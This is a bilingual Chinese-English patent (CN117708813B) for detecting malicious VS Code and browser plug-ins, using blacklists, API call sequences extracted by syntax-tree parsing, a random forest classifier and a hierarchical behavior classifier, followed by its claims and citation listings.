S335:采用网格搜索方法来遍历随机森林模型的关键参数,包括分类器个数和决策树深度,以选取最优化模型参数。S335: A grid search method is used to traverse the key parameters of the random forest model, including the number of classifiers and the depth of the decision tree, to select the optimal model parameters.

S336:对模型在测试集上的性能进行评估,并保存表现最佳的模型,供未来预测任务使用。S336: Evaluate the performance of the model on the test set and save the best performing model for future prediction tasks.

具体的,本实施例中模型文件保存的格式为Joblib。Specifically, in this embodiment, the model file is saved in the format of Joblib.

S400:对S300中输出为恶意的插件,通过层次化分类器,将API调用序列映射为特定敏感行为,然后根据这些行为的前后顺序对恶意插件进行分类,得到恶意插件类别。S400: For the plug-in output as malicious in S300, the API call sequence is mapped to specific sensitive behaviors through a hierarchical classifier, and then the malicious plug-in is classified according to the sequence of these behaviors to obtain a malicious plug-in category.

具体的,层次化分类器共有三层,自上而下分别是恶意插件类别、敏感行为类别和敏感API。Specifically, the hierarchical classifier has three layers, from top to bottom, namely malicious plug-in category, sensitive behavior category and sensitive API.

对于恶意插件类别,通过对现有的恶意插件报告的研究和对恶意样本的人工分析,一个可行的恶意插件行为分类为:敏感信息窃取、敏感文件操作、恶意命令执行、代码注入、广告注入、浏览器劫持。For the malicious plug-in category, through the study of existing malicious plug-in reports and manual analysis of malicious samples, a feasible malicious plug-in behavior classification is: sensitive information theft, sensitive file operation, malicious command execution, code injection, ad injection, and browser hijacking.

恶意插件的行为是由一系列敏感行为组成的,本实施例将恶意插件的类别与相应的敏感行为序列相关联。例如,敏感信息盗窃类别遵循“先访问敏感信息,然后通过网络发送”的行为顺序。一个可行的敏感行为类别定义为:网络发送、网络下载、文件读取、文件删除、文件修改、文件创建、代码执行、系统命令执行、外部程序执行、进程信息、系统信息获取、敏感文件操作。The behavior of malicious plug-ins is composed of a series of sensitive behaviors. This embodiment associates the category of malicious plug-ins with the corresponding sensitive behavior sequence. For example, the sensitive information theft category follows the behavior sequence of "first access sensitive information, then send it over the network". A feasible sensitive behavior category is defined as: network sending, network downloading, file reading, file deletion, file modification, file creation, code execution, system command execution, external program execution, process information, system information acquisition, and sensitive file operation.

敏感行为的实现离不开API的调用,本实施例将敏感行为序列与敏感API调用序列相关联,一个可行的敏感API定义方法是,利用现有研究中收集的API,结合对恶意样本的分析,定义能被用于恶意目的的API。The realization of sensitive behaviors is inseparable from API calls. This embodiment associates sensitive behavior sequences with sensitive API call sequences. A feasible sensitive API definition method is to use the APIs collected in existing research and combine them with the analysis of malicious samples to define APIs that can be used for malicious purposes.

实施例二:Embodiment 2:

一种软件开发环境的安全性检测系统,参见图4,包括以下模块:A security detection system for a software development environment, as shown in FIG4 , includes the following modules:

用户交互与安全态势模块:用于提供交互式界面以搜索、上传待检测插件或扫描本地安装的插件,并展示开发环境的安全状态、检测结果和历史检测记录。User interaction and security situation module: used to provide an interactive interface to search, upload plug-ins to be tested or scan locally installed plug-ins, and display the security status, test results and historical test records of the development environment.

插件信息获取模块:用于自动采集插件市场或平台上的插件源代码,为安全性分析提供数据基础。Plug-in information acquisition module: used to automatically collect plug-in source code on the plug-in market or platform to provide a data basis for security analysis.

客户端本地开发环境安全性检测模块:用于在用户端运行,自动扫描指定的插件安装路径,获取本地开发环境安装的VSCode插件和浏览器插件。Client local development environment security detection module: used to run on the user side, automatically scan the specified plug-in installation path, and obtain the VSCode plug-in and browser plug-in installed in the local development environment.

插件恶意性静态检测模块:用于通过使用抽象语法树结合正则表达式匹配提取API调用序列,并使用随机森林模型判定插件的恶意性。Plugin malicious static detection module: used to extract API call sequences by using abstract syntax trees combined with regular expression matching, and use random forest models to determine the maliciousness of plugins.

插件恶意行为判定模块:用于判定恶意插件的类别,对于被初步判定为恶意的插件,此模块通过层次化分类器,将API调用序列映射为特定敏感行为,然后根据这些行为的前后顺序对恶意插件进行分类,得到恶意插件类别。Plug-in malicious behavior determination module: used to determine the category of malicious plug-ins. For plug-ins that are initially determined to be malicious, this module uses a hierarchical classifier to map the API call sequence to specific sensitive behaviors, and then classifies the malicious plug-ins according to the order of these behaviors to obtain the malicious plug-in category.

用户管理模块:用于处理用户的注册、登录和权限验证,确保个性化安全状态和历史检测数据的安全访问。User management module: used to process user registration, login and permission verification, ensuring secure access to personalized security status and historical detection data.

数据存储模块:用于存储所有数据,包括插件信息、检测结果、用户配置和系统日志,确保数据的安全性和完整性。Data storage module: used to store all data, including plug-in information, test results, user configuration and system logs, to ensure data security and integrity.

本系统的使用流程图参见图5,有以下步骤:The flow chart of the use of this system is shown in Figure 5, which has the following steps:

步骤1:用户登录检测网站主页,选择检测的方式。例如,用户可以选择输入框搜索插件或上传插件压缩包或扫描本地插件。Step 1: The user logs in to the detection website homepage and selects the detection method. For example, the user can select the input box to search for plug-ins, upload plug-in compressed packages, or scan local plug-ins.

步骤2:根据用户选择的检测方式,执行对应的处理。Step 2: Execute corresponding processing according to the detection method selected by the user.

步骤2.1:若用户选择在输入框搜索插件,则根据其输入的插件名称或插件URL,在数据库中查询是否存在,若该插件已存在于数据库中,则直接输出数据库中保存的插件信息,若该插件不在数据库中,则通过网络爬虫下载插件压缩包,输入下一步。Step 2.1: If the user chooses to search for a plug-in in the input box, the database will be queried based on the plug-in name or plug-in URL entered. If the plug-in already exists in the database, the plug-in information saved in the database will be directly output. If the plug-in does not exist in the database, the plug-in compressed package will be downloaded through a web crawler and the next step will be entered.

步骤2.2:若用户选择上传插件压缩包,则将插件压缩包输入下一步。Step 2.2: If the user chooses to upload a plug-in compressed package, enter the plug-in compressed package into the next step.

步骤2.3:若用户选择扫描本地插件,则用户下载本地扫描程序,执行本地环境插件扫描,查询扫描得到的插件在数据库中是否存在,若已存在在数据库中,则直接输出数据库中保存的插件信息,若不在数据库中,则将插件压缩包输入下一步。Step 2.3: If the user chooses to scan local plug-ins, the user downloads the local scanning program, performs a local environment plug-in scan, and queries whether the scanned plug-in exists in the database. If it already exists in the database, the plug-in information saved in the database is directly output. If it does not exist in the database, the plug-in compression package is entered into the next step.

步骤3:对输入的插件压缩包,通过插件恶意性静态检测模块,将插件分类初步为恶意和良性,并将初步分类为恶意的插件输入下一步。Step 3: For the input plug-in compressed package, the plug-in malicious static detection module is used to preliminarily classify the plug-in into malicious and benign, and the plug-in preliminarily classified as malicious is input to the next step.

步骤4:对初步分类为恶意的插件,通过插件恶意行为判定模块,将恶意插件分类为敏感信息窃取、敏感文件操作、恶意命令执行、代码注入、广告注入和浏览器劫持。Step 4: For the plug-ins that are initially classified as malicious, the plug-in malicious behavior determination module is used to classify the malicious plug-ins into sensitive information theft, sensitive file operation, malicious command execution, code injection, ad injection, and browser hijacking.

步骤5:将检测结果展示给用户,并存入数据库中。Step 5: Display the test results to the user and store them in the database.

需要指出的是,本系统特别地实现了实施例一中详细说明的检测方法,将其集成于自动化流程中,提高了检测的效率和用户的互动性。此外,本系统的设计允许灵活的扩展和更新,以适应新的安全威胁和插件特性。It should be noted that the system specifically implements the detection method described in detail in Example 1 and integrates it into the automated process, thereby improving the detection efficiency and user interactivity. In addition, the design of the system allows for flexible expansion and updating to adapt to new security threats and plug-in features.

本领域技术人员应该知悉,说明书中所描述的实施例均属于优选实施例,不应看作是对其他实施例的排除,本领域的技术人员可以对本实施例所涉及的动作和流程进行修改,凡在本发明的精神和范围之内的修改,均应包含在本发明所附权利要求的保护范围内。Those skilled in the art should be aware that the embodiments described in the specification are all preferred embodiments and should not be regarded as excluding other embodiments. Those skilled in the art may modify the actions and processes involved in the present embodiment. Any modifications within the spirit and scope of the present invention should be included in the scope of protection of the claims attached to the present invention.

Claims (5)

1.一种软件开发环境的安全性检测方法,其特征在于,包括以下步骤:1. A method for detecting the security of a software development environment, comprising the following steps: S100:对于待检测的Visual Studio Code插件和Web浏览器插件,进行黑名单筛查,以判断其是否属于已知的恶意插件;S100: For the Visual Studio Code plug-in and Web browser plug-in to be detected, blacklist screening is performed to determine whether they are known malicious plug-ins; S200:对S100中不在恶意插件黑名单中的插件,进行代码行为静态提取,通过使用抽象语法树结合正则表达式匹配来高效地获取代码中的API调用序列;S200: For the plug-ins in S100 that are not in the malicious plug-in blacklist, perform static code behavior extraction, and efficiently obtain the API call sequence in the code by using the abstract syntax tree combined with regular expression matching; 所述S200包括以下步骤:The S200 includes the following steps: S210:首先尝试使用抽象语法树对源代码进行解析,通过遍历生成的抽象语法树获取API调用序列;S210: first try to parse the source code using an abstract syntax tree, and obtain the API call sequence by traversing the generated abstract syntax tree; S220:若抽象语法树的生成失败,启用正则匹配作为备用方案,首先识别源代码中所有的敏感API调用,再通过特定的算法对API调用进行排序;S220: If the generation of the abstract syntax tree fails, regular matching is enabled as a backup solution, first identifying all sensitive API calls in the source code, and then sorting the API calls using a specific algorithm; 所述S210包括如下步骤:The S210 includes the following steps: S211:采用语法解析器将源代码解析为抽象语法树;S211: Use a syntax parser to parse the source code into an abstract syntax tree; S212:层次遍历生成的抽象语法树获取自定义函数声明子树以及剩余代码子树,并分别将其入队;S212: The abstract syntax tree generated by the hierarchical traversal is obtained to obtain the custom function declaration subtree and the remaining code subtree, and they are queued respectively; S213:对自定义函数声明子树队列,依次对其执行出队操作,并采用前序遍历出队的子树获取敏感API调用;若自定义函数内存在自定义函数的调用,同时其已遍历完,则将其API调用序列插入调用的函数的API调用序列中;若被调用的自定义函数未更新完,将该子树重新入队;对于API调用序列获取完毕的自定义函数,则将其标记为已更新,这个过程直至所有的自定义函数的API调用顺序更新完毕;S213: Declare a subtree queue for the custom function, perform dequeue operations on it in turn, and use pre-order traversal to obtain sensitive API calls from the dequeued subtrees; if there are calls to custom functions in the custom function and the traversal has been completed, insert its API call sequence into the API call sequence of the called function; if the called custom function has not been updated, re-queue the subtree; for the custom function whose API call sequence has been obtained, mark it as updated, and this process continues until the API call sequence of all custom functions has been updated; S214:对剩余代码子树队列,依次对其执行出队操作,并采用前序遍历出队的子树获取敏感API调用,若遍历到的当前结点为自定义函数的调用,将自定义函数的有序API调用序列从后插入源文件API调用序列;S214: Dequeue the remaining code subtree queues in turn, and traverse the dequeued subtrees in pre-order to obtain sensitive API calls. If the current node traversed is a call of a custom function, insert the ordered API call sequence of the custom function into the source file API call sequence from the end; S215:重复S213和S214直到自定义函数声明子树队列和剩余代码子树队列为空,输出API调用序列;S215: repeat S213 and S214 until the custom function declaration subtree queue and the remaining code subtree queue are empty, and output the API call sequence; 所述S220包括以下步骤:The S220 includes the following steps: S221:采用正则匹配的方式匹配函数定义块的文本范围;S221: Match the text range of the function definition block by using regular matching; S222:识别源文件中所有的敏感API调用,并采用选择排序根据API调用的文本相对位置进行排序;S222: Identify all sensitive API calls in the source file, and sort them according to the relative positions of the texts of the API calls using selection sorting; S223:将位于函数定义块内的API调用加入自定义函数对应的函数调用序列;S223: adding the API call in the function definition block to the function call sequence corresponding to the user-defined function; S224:递归更新自定义函数的API调用序列,做法是将其定义块内调用的函数的排序好的API调用序列插入其自身的API调用序列,直到所有的自定义函数都更新完毕;S224: recursively updating the API call sequence of the user-defined function by inserting the sorted API call sequence of the function called in its definition block into its own API call sequence until all the user-defined functions are updated; S225:在源文件的API调用序列中移除所有位于函数定义块内的API调用;S225: removing all API calls located in the function definition block in the API call sequence of the source file; S226:识别源文件中自定义函数的调用,根据其调用位置将其API调用序列插入源文件的API调用序列中;S226: Identify the call of the custom function in the source file, and insert its API call sequence into the API call sequence of the source file according to its call position; S300:在S200步骤中提取的API调用序列基础上,通过特征工程对恶意插件行为进行建模,利用随机森林分类器静态检测插件的恶意性,将插件分类为恶意和良性;S300: Based on the API call sequence extracted in step S200, the malicious plug-in behavior is modeled through feature engineering, and the maliciousness of the plug-in is statically detected using a random forest classifier to classify the plug-in into malicious or benign. S400:对S300中输出为恶意的插件,通过层次化分类器,将API调用序列映射为特定敏感行为,然后根据这些行为的前后顺序对恶意插件进行分类,得到恶意插件类别。S400: For the plug-in output as malicious in S300, the API call sequence is mapped to specific sensitive behaviors through a hierarchical classifier, and then the malicious plug-in is classified according to the sequence of these behaviors to obtain a malicious plug-in category. 2.根据权利要求1所述的软件开发环境的安全性检测方法,其特征在于,所述S100包括以下步骤:2. The method for detecting the security of a software development environment according to claim 1, wherein S100 comprises the following steps: S110:从互联网收集公认的恶意插件数据,整合通过检测流程检测并验证的恶意插件信息,构建恶意插件黑名单,定期同步最新发现的恶意插件信息,以保证黑名单内容的全面性和时效性;S110: Collecting recognized malicious plug-in data from the Internet, integrating malicious plug-in information detected and verified through the detection process, building a malicious plug-in blacklist, and regularly synchronizing the latest malicious plug-in information to ensure the comprehensiveness and timeliness of the blacklist content; S120:用在步骤S110中构建的黑名单,对待检测插件的唯一标识符ID进行查询,若该ID存在于黑名单中,该插件则被标记为恶意插件。S120: Use the blacklist constructed in step S110 to query the unique identifier ID of the plug-in to be detected. If the ID exists in the blacklist, the plug-in is marked as a malicious plug-in. 3.根据权利要求1所述的软件开发环境的安全性检测方法,其特征在于,所述S300包括以下步骤:3. The method for detecting the security of a software development environment according to claim 1, wherein S300 comprises the following steps: S310:根据对恶意插件样本的分析,定义用于判断插件是否存在可疑行为的行为序列特征,每个特征是多个行为的有序组合,代表一种特定的敏感行为;S310: Based on the analysis of the malicious plug-in sample, a behavior sequence feature is defined for determining whether the plug-in has suspicious behavior, where each feature is an ordered combination of multiple behaviors and represents a specific sensitive behavior; S320:将S200中提取的API调用序列映射为行为序列特征向量;S320: Mapping the API call sequence extracted in S200 into a behavior sequence feature vector; S330:将特征向量送入训练好的随机森林分类器中进行预测,随机森林由多个决策树组成,它们各自对特征向量进行评估,并以投票的方式决定最终的分类结果。S330: Send the feature vector to the trained random forest classifier for prediction. The random forest consists of multiple decision trees, which each evaluates the feature vector and decides the final classification result by voting. 4.根据权利要求3所述的方法,其特征在于,所述随机森林分类器的训练方法包括以下步骤:4. The method according to claim 3, characterized in that the training method of the random forest classifier comprises the following steps: S331:构建了一个数据集,包含良性样本和恶意样本;S331: A dataset was constructed, which includes benign and malicious samples; S332:利用静态分析方法,从数据集中提取出定义好的行为序列特征,形成一个行为特征矩阵;S332: Using static analysis methods, extract defined behavior sequence features from the data set to form a behavior feature matrix; S333:将整个数据集按照8:2的比例分为训练集和测试集,以便于模型训练和评估;S333: Divide the entire dataset into training set and test set in a ratio of 8:2 to facilitate model training and evaluation; S334:通过对训练数据集进行随机采样,为每个采样得到的特征集构建决策树,每棵树通过选择最佳特征进行分割以提高节点纯度;S334: By randomly sampling the training data set, a decision tree is constructed for each sampled feature set, and each tree is split by selecting the best feature to improve the node purity; S335:采用网格搜索方法来遍历随机森林模型的关键参数,包括分类器个数和决策树深度,以选取最优化模型参数;S335: Using a grid search method to traverse the key parameters of the random forest model, including the number of classifiers and the depth of the decision tree, to select the optimal model parameters; S336:对模型在测试集上的性能进行评估,并保存表现最佳的模型,供未来预测任务使用。S336: Evaluate the performance of the model on the test set and save the best performing model for future prediction tasks. 5.一种软件开发环境的安全性检测系统,用于实现权利要求1-4任一项所述的软件开发环境的安全性检测方法,包括:5. A security detection system for a software development environment, used to implement the security detection method for a software development environment according to any one of claims 1 to 4, comprising: 用户交互与安全态势模块:用于提供交互式界面以搜索、上传待检测插件或扫描本地安装的插件,并展示开发环境的安全状态、检测结果和历史检测记录;User interaction and security situation module: used to provide an interactive interface to search, upload plug-ins to be tested or scan locally installed plug-ins, and display the security status, test results and historical test records of the development environment; 插件信息获取模块:用于自动采集插件市场或平台上的插件源代码,为安全性分析提供数据基础;Plugin information acquisition module: used to automatically collect plugin source code on the plugin market or platform to provide a data basis for security analysis; 客户端本地开发环境安全性检测模块:用于在用户端运行,自动扫描指定的插件安装路径,获取本地开发环境安装的Visual Studio Code插件和浏览器插件;Client local development environment security detection module: used to run on the user side, automatically scan the specified plug-in installation path, and obtain the Visual Studio Code plug-in and browser plug-in installed in the local development environment; 插件恶意性静态检测模块:用于通过使用抽象语法树结合正则表达式匹配提取API调用序列,并使用随机森林模型判定插件的恶意性;Plugin malicious static detection module: used to extract API call sequences by using abstract syntax trees combined with regular expression matching, and use random forest models to determine the maliciousness of plugins; 插件恶意行为判定模块:用于判定恶意插件的类别,对于被初步判定为恶意的插件,此模块通过层次化分类器,将API调用序列映射为特定敏感行为,然后根据这些行为的前后顺序对恶意插件进行分类,得到恶意插件类别;Plug-in malicious behavior determination module: used to determine the category of malicious plug-ins. For plug-ins that are initially determined to be malicious, this module uses a hierarchical classifier to map the API call sequence to specific sensitive behaviors, and then classifies the malicious plug-ins according to the order of these behaviors to obtain the malicious plug-in category; 用户管理模块:用于处理用户的注册、登录和权限验证,确保个性化安全状态和历史检测数据的安全访问;User management module: used to process user registration, login and permission verification, ensuring secure access to personalized security status and historical detection data; 数据存储模块:用于存储所有数据,包括插件信息、检测结果、用户配置和系统日志,确保数据的安全性和完整性。Data storage module: used to store all data, including plug-in information, test results, user configuration and system logs, to ensure data security and integrity.
CN202311618733.7A 2023-11-30 2023-11-30 A security detection method and system for software development environment Active CN117708813B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202311618733.7A CN117708813B (en) 2023-11-30 2023-11-30 A security detection method and system for software development environment

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202311618733.7A CN117708813B (en) 2023-11-30 2023-11-30 A security detection method and system for software development environment

Publications (2)

Publication Number Publication Date
CN117708813A CN117708813A (en) 2024-03-15
CN117708813B true CN117708813B (en) 2024-06-21

Family

ID=90163159

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202311618733.7A Active CN117708813B (en) 2023-11-30 2023-11-30 A security detection method and system for software development environment

Country Status (1)

Country Link
CN (1) CN117708813B (en)

Citations (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN109753800A (en) * 2019-01-02 2019-05-14 重庆邮电大学 Android malicious application detection method and system integrating frequent itemsets and random forest algorithm
CN112685738A (en) * 2020-12-29 2021-04-20 武汉大学 Malicious confusion script static detection method based on multi-stage voting mechanism

Family Cites Families (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US8037535B2 (en) * 2004-08-13 2011-10-11 Georgetown University System and method for detecting malicious executable code
US8713679B2 (en) * 2011-02-18 2014-04-29 Microsoft Corporation Detection of code-based malware
CN110502897A (en) * 2018-05-16 2019-11-26 南京大学 A method for identifying and deobfuscating malicious JavaScript code in web pages based on hybrid analysis
CN116484371A (en) * 2023-04-04 2023-07-25 重庆邮电大学 Android plug-in malicious detection method based on function call graph
CN117056924A (en) * 2023-08-23 2023-11-14 复旦大学 Malicious software package detection method based on malicious behavior sequence feature modeling

Patent Citations (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN109753800A (en) * 2019-01-02 2019-05-14 重庆邮电大学 Android malicious application detection method and system integrating frequent itemsets and random forest algorithm
CN112685738A (en) * 2020-12-29 2021-04-20 武汉大学 Malicious confusion script static detection method based on multi-stage voting mechanism

Also Published As

Publication number Publication date
CN117708813A (en) 2024-03-15

Similar Documents

Publication Publication Date Title
Niu et al. A deep learning based static taint analysis approach for IoT software vulnerability location
CN111459799B (en) Software defect detection model establishing and detecting method and system based on Github
CN110909364B (en) Source code bipolar software security vulnerability map construction method
CN114238958B (en) Intrusion detection method and system based on traceability clustering and graph serialization
JP2010507165A (en) Detect security vulnerabilities in source code
US20200250015A1 (en) Api mashup exploration and recommendation
CN111694746A (en) Flash defect fuzzy evaluation tool for compilation type language AS3
CN113297580A (en) Code semantic analysis-based electric power information system safety protection method and device
CN114564726B (en) A software vulnerability analysis method and system based on big data office
CN120123960A (en) A method and system for intelligent monitoring of abnormal data based on metadata
CN114579977A (en) Code vulnerability detection method for embedded operating system
CN117708813B (en) A security detection method and system for software development environment
CN111475812B (en) Webpage backdoor detection method and system based on data executable characteristics
CN119046945A (en) High-risk component safety knowledge base construction method for software supply chain
CN116756341B (en) A complete knowledge graph construction method based on multi-source vulnerability data
CN117040898A (en) Penetration test system
CN117056347A (en) SQL sentence true injection detection method, SQL sentence true injection detection device, SQL sentence true injection detection computer equipment and SQL sentence true injection detection storage medium
CN111214831B (en) A special effects editing method based on game engine
CN115586996A (en) IoT firmware fingerprint identification method and device based on open source software supply chain
CN111291373B (en) Method, apparatus and computer-readable storage medium for analyzing data pollution propagation
Bouchachia et al. Nature-inspired techniques for conformance testing of object-oriented software
Sun et al. Vulnerability finding and firmware association in power grid
CN118734828B (en) Data analysis method based on brain map
CN119995952B (en) A method for detecting APT abnormal behavior based on multi-dimensional feature fusion
CN119720202B (en) PowerShell code restoration and compression method, device, and electronic device

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant
GR01 Patent grant
点击 这是indexloc提供的php浏览器服务,不要输入任何密码和下载